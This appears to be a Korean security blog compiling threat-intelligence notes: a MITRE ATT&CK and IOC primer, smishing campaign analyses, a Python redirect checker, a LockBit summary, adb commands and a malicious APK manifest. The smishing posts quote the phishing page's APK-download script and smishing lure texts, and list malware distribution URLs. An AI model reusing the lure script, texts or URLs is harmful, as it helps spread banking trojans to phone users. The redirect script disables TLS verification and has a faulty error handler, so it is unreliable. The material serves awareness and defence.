MITRE ATT&CK는 공격 라이프사이클의 다양한 단계에서 공격자가 사용하는 다양한 전술, 기술 및 절차(TTP)를 이해, 분류 및 설명하기 위한 포괄적인 프레임워크를 제공하고 공개된 침해사고분석 보고서, 악성코드 분석 보고서, 위협 그룹에 대한 정보를 분석하여 공격자들의 TTPs를 집대성하고 체계적으로 정리한 공개된 지식 베이스, post-exploitaion 과정에서 사용되는 위협 행위들을 일관되고 명확한 방식으로 분석 및 분류 공개된 출처에서 얻은 정보(OSINT)를 통해 확인된 TTPs들만 개시되어 있고 지속적으로 업데이트를 함.

고통 피라미드

고통 피라미드 https://detect-respond.blogspot.com

네트워크 아티팩트 : 네트워크에서 적대적인 활동으로 인해 발생하는 관찰 가능 항목입니다. 기술적으로 말하면, 적의 상호 작용의 결과로 네트워크를 통해 흐르는 모든 바이트는 아티팩트일 수 있지만 실제로 이는 합법적인 사용자의 활동과 악의적인 활동을 구별하는 경향이 있는 활동의 일부를 의미합니다. 일반적인 예로는 URI 패턴, 네트워크 프로토콜에 포함된 C2 정보, 고유한 HTTP 사용자 에이전트 또는 SMTP 메일러 값 등이 있습니다.

호스트 아티팩트(Host Artifacts) : 하나 이상의 호스트에서 적대적인 활동으로 인해 발생한 관찰 가능 항목입니다. 다시 한번, 우리는 악의적인 활동과 합법적인 활동을 구별하는 경향이 있는 사항에 중점을 둡니다. 이는 특정 맬웨어, 특정 위치에 삭제된 파일 또는 디렉터리의 특정 조각에 의해 생성되거나 특정 이름, 이름 또는 설명, 악성 서비스 또는 기타 특징적인 거의 모든 항목에 의해 생성된 것으로 알려진 레지스트리 키 또는 값일 수 있습니다.

도구 : 적이 임무를 완수하기 위해 사용하는 소프트웨어입니다. 대부분 이는 컴퓨터에 이미 설치되어 있는 소프트웨어나 명령이 아니라 함께 가져오는 것들입니다. 여기에는 스피어피싱을 위한 악성 문서를 생성하도록 설계된 유틸리티, C2 또는 비밀번호 크래커를 구축하는 데 사용되는 백도어 또는 손상 후 사용하려는 기타 호스트 기반 유틸리티가 포함됩니다.

전술, 기술 및 절차(TTP) : 정찰부터 데이터 유출까지, 그리고 그 사이의 모든 단계에서 적이 임무를 완수하는 방법입니다. "스피어피싱"은 네트워크에서 존재감을 확립하기 위한 일반적인 TTP입니다. "트로이 목마가 있는 PDF 파일을 사용한 스피어피싱" 또는 "ZIP으로 위장한 악성. SCR 파일에 대한 링크가 있는..."이 보다 구체적인 버전입니다. "캐시 된 인증 자격 증명을 덤프하고 Pass-the-Hash 공격에서 재사용하는 것"은 TTP입니다. PDF를 무기화하거나 Pass-the-Hash를 구현하는 방법은 다양하므로 여기서는 특정 도구에 대해 이야기하지 않습니다.

IOC와 TTPs

IOC (Indicator Of Compromise, 침해지표)

시스템이 악의적인 활동에 의해 침해되었을 가능성이 높음을 보여주는 운영체제 또는 네트워크 아티팩트
IOC로 주로 사용되는 정보 : 해쉬값, 파일 이름 및 경로, C2도메인, IP어드레스, URI, 레지스트리 키, 서비스 이름/정보, 스케줄 된 태스크 정보 등
특정 위협이나 공격이 발생했는지를 판단하기 위한 시그니처로 인식되고 활용되어 왔음
알려진 위협의 특정 인스턴스를 탐지하는 데 효과적이지만 기존 IOC와 일치하지 않으면 찾기 힘듦
일반적으로 바이러스 백신, IDS(침입 탐지 시스템), STEM(보안 정보 및 이벤트 관리) 플랫폼의 시그니처 기반 탐지에 사용됨

TTPs(Tactics, Techniques and Procedures)

TTP는 위협 행위를 체계적으로 설명하기 위한 일종의 모델
Tactics (전술)은 위협 행위의 목적을 나타냄
Techniques (테크닉)은 위협 행위의 목적을 달성하기 위해 사용하는 테크닉을 의미함
Procedures (프로시저)는 테크닉을 구현하기 위한 구체적인 절차와 방법을 의미함
특정 IOC가 없는 경우에도 TTP를 기반으로 악성 징후를 포착해 대응할 수 있음
EDR에서도 사용됨

차이점은 IOC는 알려진 위협과 관련된 특정 지표에 초점을 맞추는 반면, TTP 기반 탐지는 미리 정의된 지표가 없을 수 있는 위협을 포함하여 더 넓은 범위의 위협을 탐지하기 위해 공격자의 행동과 전술을 이해하는데 중점을 둔다.

재혼 관련 청첩장 사칭 피싱 사이트(23.01.28)

카고형 — Mon, 29 Jan 2024 07:29:39 +0900

지인 관련 스미싱인 재혼 관련 청첩장 사칭 피싱 사이트입니다.

해당 스미싱 문구는 지인 사칭으로 배포되고 있습니다. 지인 사칭 스미싱 문구는 결혼식, 돌잔치, 지인 행사, 부고 관련 메세지를 포함하여 보내고 있습니다. 해당 피싱 사이트는 재혼 관련 메세지를 사칭하여 스미싱 문구를 베포 합니다.
해당 건은 기존 청첩장과 스미싱 형태나 악성앱 형태가 유사 합니다. 문구를 보면 결혼식에서 재혼 쪽으로 바뀐 것을 알 수 있습니다.

모르는 번호로 전화가 왔을때는 항상 꼼꼼히 확인하시셔서 피해 없으시길 바랍니다.

문구)

"[Web발신] 저희 [재혼] 합니다 말도 많고 탈도 많은 저희 커플 우여곡절 끝에
함께 이겨내기로 했습니다.
모든이의 축복 속에 잘살겠습니다.
참석하시어 축하해주세요
주소:http://URL"

피싱 사이트 접속 화면

해당 피싱 사이트는 접속후 클릭을 하게 되면 apk 파일이 다운하게 됩니다.

부고장 스미싱과 똑같이 문구에는 장소가 포함되지 않았기 때문에 피싱 페이지에서 열기 버튼을 누르면 확인할 수 있는 것처럼 접속한 사용자가 클릭하게 끔 유도하는 형태로 보입니다.

HTML 분석

해당 페이지는 청첩장 이미지를 보여주고, 클릭 시 악성앱을 다운로드 하게 됩니다.

<script>
        window.location = "ynwtuu://?install";

        function downAlert() {
            if (window.confirm("결혼식장 장소와 시간을 보기위하여 확인을눌러주세요.")) {
                
                const newTab = window.open('', '_parent');
                const downloadLink = document.createElement('a');
                downloadLink.href = '/app'; 
               downloadLink.setAttribute('download', '모바일 결혼.apk');
                newTab.document.body.appendChild(downloadLink);
                downloadLink.click(); 
                window.location = "ynwtuu://?install";
            } 
          

        }
        var $main = $('.preview-main');
        var css_obj = $main.data('css');
        $main.css('background-color', css_obj.backgroundColor);

        $('.J_prev').on('click', () => {
            tabPage(1)
        });
        $('.J_next').on('click', () => {
            tabPage(-1)
        });
        var wrapper = document.getElementById('wrapper');

        function tabPage(is_up) {
            wrapper.contentWindow.postMessage(is_up, '*');
        }
      

    </script><a href="https://go.appp.ooguy.com/app" download="모바일 결혼.apk"

이미지를 클릭 하면 "결혼식장 장소와 시간을 보기 위하여 확인을눌러주세요." 창이 뜨고, /app 페이지로 넘어가게 됩니다.

해당 스미싱 문자에 포함된 URL을 누르게되면 결혼식 초대장 피싱 사이트로 접속하게 되며, 페이지에 있는 이미지 클릭 시 특정 페이지로 넘어가게 되며, 최종적으로는 APK파일을 다운로드하게 됩니다. 해당 APK 파일은 악성 앱입니다.

검색 사이트에서 해당 회사나 기관들을 검색하시고, 검색 결과 대부분은 상위 페이지에 노출됩니다.

휴대전화 보안 그리고 악성 앱 제거 방법

KISA 스마트폰 안전 수칙 10 계명

① 의심스러운 애플리케이션 다운로드하지 않기

② 신뢰할 수 없는 사이트 방문하지 않기

③ 발신인이 불명확하거나 의심스러운 메시지 및 메일 삭제하기

④ 비밀번호 설정 기능을 이용하고 정기적으로 비밀번호 변경하기

⑤ 블루투스 등 무선인터페이스는 사용 시에만 켜놓기

⑥ 이상 증상이 지속될 경우 악성코드 감염 여부 확인하기

⑦ 다운로드한 파일은 바이러스 유무를 검사한 후 사용하기

⑧ PC에도 백신 프로그램을 설치하고 정기적으로 바이러스 검사하기

⑨ 스마트폰 플랫폼의 구조를 임의로 변경하지 않기

⑩ 운영체제 및 백신 프로그램을 항상 최신 버전으로 업데이트하기

카카오 계열사 사칭 피싱 사이트 (24.01.19)

카고형 — Sun, 21 Jan 2024 15:18:15 +0900

해당 기사는 최근에 발생한 스미싱 공격에 대한 내용입니다. 메시지의 내용은 가짜 '카카오P'로부터 온 송금 안전성을 강조하며, 사용자에게 링크 클릭을 유도하는 것으로 나타났습니다.
'카카오P'라는 계열사는 실제로 존재하지 않았습니다. 이 스미싱 문자는 주로 사용자를 현금으로 유인하여 개인 정보를 탈취하거나 피싱 사이트로 유도하여 악성앱을 설치하는 전형적인 스미싱 공격 방식을 사용하고 있습니다. 아래는 기사 원문입니다.

[긴급] ‘5만원이 지급되었습니다’ 카카오 계열사 사칭 스미싱 주의보

https://www.boannews.com/media/view.asp?idx=125913&page=1&kind=1

[긴급] ‘5만원이 지급되었습니다’ 카카오 계열사 사칭 스미싱 주의보

‘친구님이 카카오P에서 5만원을 송금했습니다. 안전한 송금입니다. 친구에게 송금여부를 직접 확인해보세요.’ 19일 카카오 계열사를 사칭한 ‘카카오P’로부터 온 문자 메시지 내용이다. 내용

www.boannews.com

해당 스미싱은 '카카오픽'이라는 존재 하지 않는 카카오계열사를 사칭하여 카카오계열사에서 진행하는 이벤트인 것처럼 속여 송금한 금액을 안전하게 받으려면 링크를 누르게 끔 문자 문구를 작성한 스미싱 문구를 배포하여 피싱 사이트로 접속 유도하는 형태입니다.

스미싱 문구

5만원이 지급되었습니다.
[Web발신]
친구님이 카카오P에서 "xxxxx"님께 5만원을 송금 했습니다

안전한 송금 입니다 친구에게 송금여부를 직접 확인 해보세요
●금액:50,000원
●기한:2024-01-20 23:59:59까지

아래 링크를 통해 송금을 받아주세요.
https://xgo.kr/5KL

-----------

이 메시지는 카카오P 클릭참여를 통해 지원되는 이벤트로 발송되었으며, 메시지를 받은 전화번호로만 금액을 수령할 수 있습니다.

출처: 보안뉴스

※ 아무리 이벤트라고 해도 앱 다운의 정상 배포방식은 애플스토어, 원스토어, 구글플래이 해당 사이트(어플)를 통해서만 배포합니다.

피싱 사이트 접속 화면

카카오P 사칭 피싱 사이트

스미싱 문자에 포함된 URL 주소로 접속하게 되면 '카카오 픽'이라는 이름과 함께 이벤트 페이지로 보이는 곳으로 접속하게 됩니다. 해당 페이지는 이벤트를 참여하려면 아래에 있는 '참여하러 가기'라는 버튼을 클릭하게 유도합니다. 해당 버튼을 클릭하게 되면 APK파일을 다운로드하게 됩니다. 다운로드한 APK파일은 악성앱입니다.

VirusTotal 탐지 결과

AhnLab-V3 : PUP/Android.Malct.1190475
Alibaba : TrojanBanker:Android/SoumniBot.22cbcb3d
Avast-Mobile : Android:Evo-gen [Trj]
Avira (no cloud) : ANDROID/AVE.Evo.mlzim
BitDefenderFalx : Android.Trojan.Agent.gQNSO
Cynet : Malicious (score: 99)
ESET-NOD32 : A Variant Of Android/Spy.Agent.DBB
Google : Detected
Ikarus : Trojan-Spy.AndroidOS.Agent
K7GW : Spyware ( 005af3231 )
Kaspersky : HEUR:Trojan-Banker.AndroidOS.SoumniBot.c
McAfee : Artemis!0CC882453FE7
Skyhigh (SWG) : Artemis!Trojan
Symantec : Trojan.Gen.MBT
Symantec Mobile Insight : AdLibrary:Generisk
Tencent : Android.Trojan-Banker.Soumnibot.Kqil
Trustlook : Android.Malware.Spyware
WithSecure : Malware.ANDROID/AVE.Evo.mlzim
ZoneAlarm by Check Point : HEUR:Trojan-Banker.AndroidOS.SoumniBot.c

요새 피싱 사이트를 잘 만들기 때문에 항상 SNS 나 SMS 등 문구를 잘 확인하시고, 개인정보 입력 요구 시에는 항상 한 번 더 생각하고, 정상 사이트인지 확인하시기 바랍니다.
검색 사이트에서 해당 회사나 기관들을 검색하시고, 검색 결과 대부분은 상위 페이지에 노출됩니다.
전화번호만 있는 경우 전화했을 때 앱 설치하라고 링크를 보내주는 건 거르시고 직접 앱 스토어에 들어가서 설치하시기 바랍니다. 항상 앱 설치 하실 때는 신뢰 가능한 원스토어나 플레이스토어 등을 이용하시는 게 좋습니다.
신고는 기존에 신고는 경찰청, 금감원, KISA에 따로 신고하고 절차가 복잡했는데 이번에 경찰과 금융감독원, 한국인터넷진흥원(KISA), 방송통신위원회, 통신 3사 직원 등이 합처서 운영되는 통합신고대응센터(112)로 신고 가능 하니 참고 하시면 좋습니다.
통합신고대응센터는 보이스피싱 피해 신고 창구를 112로 통합해 사건 접수뿐 아니라 악성 앱 등 범행수단 차단, 피해구제 및 지급정지와 추가예방 등을 한 번에 처리할 수 있게 했다. 피해가 없거나 단순 상담건인 경우에는 피해구제 방법을 안내하고 추가 예방 방법 등을 알려줍니다.

단축 URL 리다이렉트 확인

카고형 — Wed, 17 Jan 2024 17:49:07 +0900

개요

업무중에 단축 URL 이나 URL을 많이 봐야 하는데, 사람이 일일이 보는게 너무 힘들다고 느껴져서 만들어 볼까 하고 시작함. 단축 기준 접속시 최종으로 접속되는 URL이 필요하고, 해당 URL에 도메인, 접속 되는지에 대한 상태코드 정도 필요 하다 싶어서 해당 기준으로 잡고 시작함.

ShortURL_Redirect

비번 : cago

ShortURL_Redirect.zip

7.03MB

입력값은 txt 파일로 받아 출력 값으로는 입력 URL, 리다이렉트 URL, 리다이렉트 도메인, 리다이렉트 도메인 상태코드
리다이렉트 도메인 값은 입력 URL 과 리다이렉트 URL이 다를때만 나오게 된다.

실행 순서

1. input.txt 에 확인 할 URL 넣는다

2. ShortURL_Redirect_flow.exe 실행

3. CSV 파일 떨어지면 확인

2024/01/18 병렬처리 방식으로 바꿈
2024/01/19 테스트 500개 돌리면 메모리 99MB 정도 사용 쓰레드 수 2~3배정도 늘려도 될꺼 같음. 회사에서 동작안됨....
2024/01/21 회사에서 동작안되는거는 쓰레드가 멈춤 현상이 있음
2024/01/22 retrun 말고 raise 이용하니 쓰레드 멈추는거 해결 하긴함. 하지만 접속은 되는데 HTTPConnectionPool 에러 뜨는 현상 발견..

#-*- coding: utf-8 -*-
import requests
import csv
import time
import threading
from concurrent.futures import ThreadPoolExecutor
import concurrent.futures 

headers = {
    'User-Agent': 'Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36'}
def get_final_redirected_url(url):
    url_in = url
    try:
        with requests.Session() as session:
            session.headers.update(headers)
            response = session.get(url, allow_redirects=False, verify=False, timeout=10)
        # 최종 리다이렉트된 URL 가져오기
            while response.headers.get('Location'):
                if("." in response.headers.get('Location')):
                    url = response.headers['Location']
                    response = session.get(url, allow_redirects=False,verify=False, timeout=10, )
            
                else: return url
            return url
    except requests.exceptions.Timeout as errc:
        domain_c = domain_cutting(url_in, url)
        if("wsgadd.kt.com") in url:
            state_code = "KT 스미싱"            
            Csv_Writer(url_in, url, domain_c, state_code)
            raise
        
        Csv_Writer(url_in, url, domain_c, "확인")
        raise

    except requests.RequestException as e:
        return url



def domain_cutting(final_redirected_url:str, original_url:str):
    final_redirected_url = final_redirected_url.replace('https://', '').replace('http://', '')
    original_url = original_url.replace('https://', '').replace('http://', '')

    final_redirected_url2 = final_redirected_url.split('/') 
    original_url2 = original_url.split('/')    
    
    if(final_redirected_url2[0] == original_url2[0]):
        return None
    else:
        final_domain_url = final_redirected_url2[0]

        return final_domain_url

def check_status_code(final_redirected_url):
    try:
        with requests.Session() as session:
            session.headers.update(headers)
            response = session.get(final_redirected_url)
            response.raise_for_status()  # 이 부분에서 상태 코드를 체크하여 에러가 있으면 예외 발생
            return response.status_code
        
    except requests.exceptions.HTTPError as errh:
        return("HTTP error")
    except requests.exceptions.ConnectionError as errc:
        return("error Connecting")
    except requests.exceptions.Timeout as errt:
        return("Timeout error:")
    except requests.exceptions.RequestException as err:
        return ("Request error")

def Csv_Writer(original_url, final_redirected_url, final_domain, final_status_code):
    with csv_lock:
        with open(output_filename, 'a', newline='') as outfile:
            csv_writer = csv.writer(outfile)
            csv_writer.writerow([original_url, final_redirected_url, final_domain, final_status_code])

def process_url(original_url:str):

    if "https://" in original_url:
        pass
    else:
        original_url = original_url.replace("http://", "https://")
    try:
        final_redirected_url = get_final_redirected_url(original_url)
        final_status_code = check_status_code(final_redirected_url)
        final_domain = domain_cutting(final_redirected_url, original_url)
        Csv_Writer(original_url, final_redirected_url, final_domain, final_status_code)

    except Exception as e:
        Csv_Writer(original_url, url, final_domain, final_status_code)
        print(f"An error occurred for URL {original_url}: {e}")
        raise


if __name__ == "__main__":
    input_filename = "input.txt"  # 입력 파일명을 적절히 수정
    output_filename = "output.csv"  # 출력 파일명을 적절히 수정
    csv_lock = threading.Lock()
    count_time = time.time()



    with open(output_filename, 'w', newline='',encoding="utf-8") as outfile:
        csv_writer = csv.writer(outfile)
        csv_writer.writerow(['Original URL', 'Final Redirected URL', 'Final_domain', 'Fianl_status_code'])  # CSV 헤더 작성
        
         # 세션 객체 생성 및 헤더 설정

        with open(input_filename, 'r', encoding="utf-8") as infile, ThreadPoolExecutor(max_workers=200) as executor:
            futures = {executor.submit(process_url, line.strip()): line for line in infile} 

        for future in concurrent.futures.as_completed(futures):
            try:
                url = futures[future]
                future.result()
              
            except Exception as e:
                print(f"An error occurred for URL {url}: {e}")
        
        print(time.time() - count_time)
           
    print(f"Processing completed. Output saved to {output_filename}")

LockBit 랜섬웨어 3.0

카고형 — Sun, 31 Dec 2023 16:03:13 +0900

최근 공격 받은 암센터 관련 뉴스

https://therecord.media/seattle-fred-hutch-cancer-center-ransomware-attack

Seattle cancer center confirms cyberattack after ransomware gang threats

A cybercrime group has listed the Fred Hutchinson Cancer Center on its data leak site. Local news reports said individual patients were being extorted.

therecord.media

1. 소개

LockBit은 악명 높은 랜섬웨어 스트레인 중 하나로, 기업 및 기관을 주요 타깃으로 하는 고급 악성 소프트웨어입니다. 최근에 병원을 공격을 했었습니다. 랜섬웨어는 기기의 파일을 암호화하고 해독키를 제공하기 위해 대상에게 금전을 요구합니다. 그리고 이 요구에 따르지 않으면 피해자의 데이터를 영구적으로 손상시키거나 공개할 위협을 합니다.

2. 동작 방식

LockBit은 일반적으로 악성 이메일(스피어 피싱), 피싱 링크, 또는 악성 다운로더와 같은 각종 사회 공학 기술을 사용하여 기기에 침투합니다. 한 번 기기에 침투하면 시스템의 중요한 파일을 암호화하고, 그 후에 피해자에게 암호 해독을 위한 해독키와 금액을 지불하도록 요구합니다.

3. 특징

자동화된 프로세스: LockBit은 자동화된 프로세스를 통해 기업 네트워크를 탐색하고 효율적으로 파일을 암호화합니다.
빠른 암호화: 랜섬웨어가 기기에 침투하면 빠르게 파일을 암호화하며 금액을 요구합니다.
이중 위협: LockBit은 데이터를 암호화하는 것 외에도 압축된 형태로 백업을 만들어 데이터를 보호하지 못하게 합니다. 이는 데이터 손실 위협을 증가시킵니다.
금전 요구: 해독키를 얻기 위해 피해자에게 일정 금액의 비트코인 또는 기타 암호화폐를 요구합니다.

행위 : NSIS 스크립트, 코드난독화 해제, 안티 디버깅, 관리자 권환 획득, 권한 상승, 암호화 옵셥 지정, 암호화 확장자 생성, 아이콘변경, 배경화면 변경, 랜섬노트 생성등

4. 예방 및 대응

보안 업데이트: 시스템 및 소프트웨어를 최신 상태로 유지하고 보안 업데이트를 시행하여 새로운 취약점으로부터 보호합니다.
백업: 주기적으로 중요한 데이터를 안전한 위치에 백업하고, 백업 데이터의 무결성을 확인합니다.
사용자 교육: 피싱 공격 및 악성 링크를 인식하는 교육을 받은 사용자는 랜섬웨어에 노출될 위험이 줄어듭니다.
보안 소프트웨어: 강력한 안티바이러스 및 악성 코드 방지 소프트웨어를 사용하여 기기를 보호합니다.
LockBit과 같은 랜섬웨어에 대한 예방은 항상 중요하며, 효과적인 백업 및 보안 정책을 구현하여 기업 및 기기를 보호하는 것이 필요합니다.

lockbit 랜섬웨어 3.0 보고서 참고 및 랜섬웨어 암호기능 분석 보고서

https://www.somansa.com/security-report/security-note/lockbit30_202212/

개인정보보호 1위기업 소만사

내부정보유출방지(DLP), 개인정보유출방지, DB접근제어, 유해사이트 차단 솔루션 기업

www.somansa.com

https://seed.kisa.or.kr/kisa/Board/167/detailView.do

KISA 암호이용활성화 - 암호 역기능 대응 - 자료실

한국인터넷진흥원(KISA)에서는 LockBit 3.0 랜섬웨어 암호기능 분석 보고서를 배포하고 있습니다. 내용 : 랜섬웨어 실행과정 및 암호화 과정, 복구 가능성 등 다음글 2023-12-21 이전글 2023-12-22

seed.kisa.or.kr

자주 사용 하는 adb 명령어

카고형 — Fri, 15 Dec 2023 18:27:10 +0900

Android 디버그 브릿지

기기와 통신할 수 있도록 지원하는 다목적 명령줄 도구입니다.

작동 방식은 adb 클라이언트를 시작하면 클라이언트는 먼저 이미 실행 중인 adb 서버 프로세스가 있는지 확인합니다. 없으면 서버 프로세스를 시작합니다. 서버가 시작되면 로컬 TCP 포트 5037에 바인딩되고 adb 클라이언트에서 전송된 명령어를 받습니다.

애뮬레이터는 한쌍의 포트를 사용하는데, 하나는 콘솔 연결용, adb 연결용 포트로 사용합니다.

애뮬레이터 1, 콘솔 : 5554
애뮬레이터 1, adb : 5555

자주 사용 하는 명령어

adb devices [ -l ] : 연결된 기기목록의 상태를 보여줍니다.

-ㅣ 옵션은 기기 무엇인지 알려줍니다

adb kill-server : adb 서버 종료

adb start-server : adb 서버 실행

adb install <path_to_your.apk> : apk 설치

adb uninstall <package> : 특정 패키지 삭제

adb forward tcp:6666 tcp:5555 : 포트전달
ex) 호스트 포트 6666 -> 5555로 전달

adb pull remote local : 기기에서 파일 및 폴더 가져오기

adb push local remote : 기기에 파일 및 폴더 넣기
ex) adb push ./test.txt /sdcard/myfile.txt

adb shell

대부분 토이박스에서 shell 명령어 확인 가능

토이박스(shell 명령어 지원) https://landley.net/toybox/quick.html

adb shell pm list <package> : 디바이스에 설치된 패키지 목록을 표시합니다.

adb shell am start -n <Package/activity> : 특정 액티비티 실행

adb shell am force-stop <Package> : 특정 앱(패키지) 강제 종료

adb shell dumpsys <package> : 특정 패키지의 상세 정보를 표시합니다.

adb shell dumpsys : 시스템 상태 및 서비스 정보 덤프

adb shell pm list permission-groups -f : 권한 그룹과 그에 속한 권한 목록을 표시합니다

adb shell pm list permissions -g -f : 그룹별 권한과 해당 권한이 사용된 패키지 목록을 표시합니다

https://developer.android.com/studio/command-line/adb?hl=ko#shellcommands

Android 디버그 브리지(adb) | Android 개발자 | Android Developers

기기와 통신할 수 있도록 지원하는 다목적 명령줄 도구인 Android 디버그 브리지에 대해 알아보세요.

developer.android.com

[악성 앱] 국민건강보험 사칭 악성앱 분석 (23.12.03)

카고형 — Mon, 11 Dec 2023 02:00:16 +0900

공기관 사칭 스미싱인 국민건강보험 피싱 사이트입니다.

해당 스미싱은 건강검사 통지서 관련으로 국민건강보험에서 보낸 것처럼 건강검진 안내 문구를 사칭해 스미싱 문자를 보내는 형태입니다. 스미싱 문자는 건강보험, 건강검사, 건강검진, 국민보험공단, 통지서, 통보문, 통보서, 신체검사, 통지내역, [The보험센터] , [국민보험공단] 등 이러한 문구가 포함된 문자를 보내는 형태로 배포되고 있습니다.

저번달에 나온 국민건강보험 사칭 피싱 사이트 (23.11.01)와 차이점은 피싱 페이지가 바뀐 것이 확인 가능 합니다.

모르는 번호로 연락이 오면 항상 꼼꼼히 확인하셔서 피해 없으시길 바랍니다.

스미싱 문구

[국민보험공단]
신체검사 통지서내역 발급완료. 내용조회 http://URL

[The보험센터]
건강검사 통보내역 발급완료. 내용조회 https://URL

정상 배포 방식

건강보험 앱

※ 정상 배포방식은 원스토어, 구글플래이 해당 사이트(어플)를 통해서만 배포합니다.

피싱 사이트 접속 화면

HTML 분석

해당 페이지는 건강검진 이미지를 보여주고, 클릭 시 악성앱을 다운로드하게 됩니다.

유포지 URL 주소

https://iz02.q0vf.autos/
https://iz02.q0vf.autos/apk/nhis.apk

https://u10.ou4u.boats/
https://u10.ou4u.boats/apk/nhis.apk

스미싱 문자에 포함된 URL 주소로 접속하면 '국민건강보험' 사칭 피싱 사이트 페이지로 접속된다. 해당 페이지에서는 "국민건강보험 어플 다운로드"라는 버튼이 보이고, 해당 버튼을 클릭하게 되면 APK 파일을 다운로드하게 된다. 다운로드한 APK 파일은 악성앱입니다.

악성 앱 리소스 분석

APK 파일 정보

App Name: The건강보험
App Version : 1.0
Package Name : badhbiij.ahgbdeak.afeaebfl

MD5 : 083174aed67fcac342c636bf36347ab5
SHA-1 : 4d5102bb77cd29d3b25e362b7d22f68a1d777790
SHA-256 : 3d04e86a4f798ce8f982b37cf31e05fa942b9b3445da4deced5e00ac54b854de
Vhash : b24b2660da3ad4355401214dff678cb7
SSDEEP : 196608:ip7xELXZcSaoipnVxYaBkYdOgJFoufr7RsiGs3Pj1iBdc8OT:07xEDtaoAYfgLTxsiGs3PjV1T

VirusTotal 탐지 결과

Avira (no cloud) : ANDROID/Malformed.ZIP.Gen
Cynet : Malicious (score: 99)
DrWeb : Android.Packed.15.origin
ESET-NOD32 : A Variant Of Android/TrojanDropper.Agent.LKS
F-Secure : Malware.ANDROID/Malformed.ZIP.Gen
Fortinet : Android/Agent.LKS!tr
Google : Detected
Ikarus : Trojan-Spy.AndroidOS.Letscall
Kaspersky : HEUR:Trojan-Spy.AndroidOS.FakeApp.q
ZoneAlarm by Check Point : HEUR:Trojan-Spy.AndroidOS.FakeApp.q

virustotal 정보

Android Manifest

aapt dump xmltree The건강보험_1.0.apk AndroidManifest.xml

Xml 정보

  E: manifest (line=2)
    A: android:versionCode(0x0101021b)=(type 0x10)0x1
    A: android:versionName(0x0101021c)="1.0" (Raw: "1.0")
    A: android:compileSdkVersion(0x01010572)=(type 0x10)0x17
    A: android:compileSdkVersionCodename(0x01010573)="6.0-2438415" (Raw: "6.0-2438415")
    A: package="badhbiij.ahgbdeak.afeaebfl" (Raw: "badhbiij.ahgbdeak.afeaebfl")
    A: platformBuildVersionCode=(type 0x10)0x17
    A: platformBuildVersionName="6.0-2438415" (Raw: "6.0-2438415")
    E: uses-sdk (line=0)
      A: android:minSdkVersion(0x0101020c)=(type 0x10)0x1a
      A: android:targetSdkVersion(0x01010270)=(type 0x10)0x20
    E: uses-permission (line=3)
      A: android:name(0x01010003)="android.permission.INTERNET" (Raw: "android.permission.INTERNET")
    E: uses-permission (line=4)
      A: android:name(0x01010003)="android.permission.ACCESS_NETWORK_STATE" (Raw: "android.permission.ACCESS_NETWORK_STATE")
    E: uses-permission (line=5)
      A: android:name(0x01010003)="android.permission.READ_PRIVILEGED_PHONE_STATE" (Raw: "android.permission.READ_PRIVILEGED_PHONE_STATE")
    E: uses-feature (line=6)
      A: android:name(0x01010003)="android.hardware.telephony" (Raw: "android.hardware.telephony")
      A: android:required(0x0101028e)=(type 0x12)0x0
    E: uses-permission (line=7)
      A: android:name(0x01010003)="android.permission.READ_PHONE_STATE" (Raw: "android.permission.READ_PHONE_STATE")
    E: uses-permission (line=8)
      A: android:name(0x01010003)="android.permission.READ_PHONE_NUMBERS" (Raw: "android.permission.READ_PHONE_NUMBERS")
    E: uses-permission (line=9)
      A: android:name(0x01010003)="android.permission.VIBRATE" (Raw: "android.permission.VIBRATE")
    E: uses-permission (line=10)
      A: android:name(0x01010003)="android.permission.READ_SMS" (Raw: "android.permission.READ_SMS")
    E: uses-permission (line=11)
      A: android:name(0x01010003)="android.permission.RECEIVE_SMS" (Raw: "android.permission.RECEIVE_SMS")
    E: uses-permission (line=12)
      A: android:name(0x01010003)="android.permission.RECEIVE_MMS" (Raw: "android.permission.RECEIVE_MMS")
    E: uses-permission (line=13)
      A: android:name(0x01010003)="android.permission.SEND_SMS" (Raw: "android.permission.SEND_SMS")
    E: uses-permission (line=14)
      A: android:name(0x01010003)="android.permission.READ_CONTACTS" (Raw: "android.permission.READ_CONTACTS")
    E: uses-permission (line=15)
      A: android:name(0x01010003)="android.permission.GET_ACCOUNTS" (Raw: "android.permission.GET_ACCOUNTS")
    E: uses-permission (line=16)
      A: android:name(0x01010003)="android.permission.READ_EXTERNAL_STORAGE" (Raw: "android.permission.READ_EXTERNAL_STORAGE")
    E: uses-permission (line=17)
      A: android:name(0x01010003)="android.permission.WRITE_EXTERNAL_STORAGE" (Raw: "android.permission.WRITE_EXTERNAL_STORAGE")
    E: uses-permission (line=18)
      A: android:name(0x01010003)="android.permission.WAKE_LOCK" (Raw: "android.permission.WAKE_LOCK")
    E: uses-permission (line=19)
      A: android:name(0x01010003)="android.permission.RECEIVE_BOOT_COMPLETED" (Raw: "android.permission.RECEIVE_BOOT_COMPLETED")
    E: uses-permission (line=20)
      A: android:name(0x01010003)="android.permission.FOREGROUND_SERVICE" (Raw: "android.permission.FOREGROUND_SERVICE")
    E: application (line=21)
      A: android:theme(0x01010000)=@0x7f100199
      A: android:label(0x01010001)=@0x7f0f001c
      A: android:icon(0x01010002)=@0x7f0d0000
      A: android:name(0x01010003)="e6mx.ebj.j0tc.n5d" (Raw: "e6mx.ebj.j0tc.n5d")
      A: android:debuggable(0x0101000f)=(type 0x12)0x0
      A: android:allowBackup(0x01010280)=(type 0x12)0x0
      A: android:supportsRtl(0x010103af)=(type 0x12)0xffffffff
      A: android:extractNativeLibs(0x010104ea)=(type 0x12)0xffffffff
      A: android:fullBackupContent(0x010104eb)=@0x7f120000
      A: android:usesCleartextTraffic(0x010104ec)=(type 0x12)0xffffffff
      A: android:networkSecurityConfig(0x01010527)=@0x7f120002
      A: android:appComponentFactory(0x0101057a)="androidx.core.app.CoreComponentFactory" (Raw: "androidx.core.app.CoreComponentFactory")
      A: android:requestLegacyExternalStorage(0x01010603)=(type 0x12)0xffffffff
      A: android:dataExtractionRules(0x0101063e)=@0x7f120001
      E: activity (line=22)
        A: android:name(0x01010003)="badhbiij.ahgbdeak.afeaebfl.ecgcfecj" (Raw: "badhbiij.ahgbdeak.afeaebfl.ecgcfecj")
        A: android:exported(0x01010010)=(type 0x12)0xffffffff
        E: intent-filter (line=23)
          E: action (line=24)
            A: android:name(0x01010003)="android.intent.action.MAIN" (Raw: "android.intent.action.MAIN")
          E: category (line=25)
            A: android:name(0x01010003)="android.intent.category.LAUNCHER" (Raw: "android.intent.category.LAUNCHER")
      E: provider (line=28)
